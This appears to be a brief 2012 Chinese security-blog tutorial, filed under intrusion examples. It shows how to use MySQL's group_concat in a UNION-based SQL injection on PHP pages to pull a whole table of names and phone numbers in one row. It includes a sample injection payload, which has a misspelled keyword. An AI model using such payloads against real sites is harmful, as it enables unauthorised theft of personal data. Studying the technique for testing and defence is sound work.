php mysql注入的一种快速有效union方法select出数据库内容

		当前位置：主页>安全文章>文章资料>入侵实例>文章内容

php mysql注入的一种快速有效union方法select出数据库内容

来源：http://hi.baidu.com/it_security/blog 作者：it_security 发布时间：2012-03-23

php sql injector的时候，很多情况下都是显示一行一行的数据，要一次得到全部数据或者表格，那就的重复多次。

函数group_concat可以实现将表格放入一个单元格中（即仅有一行一列）

例如：

select group_concat(id,0x7c,name,0x7c,tel,0x5d) from g

那么将得到：

1|张三|83023023],|李四|13893232322],.....

（注意上面查询结果不是一行多列，而是一行一列）

假设原来的sql注入地方为：

select name from userinfo where id=$id

那么可以这样构造：

id=1 and 1=2 union selelct group_concat(id,0x7c,name,0x7c,tel,0x5d) from g

[

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

推荐广告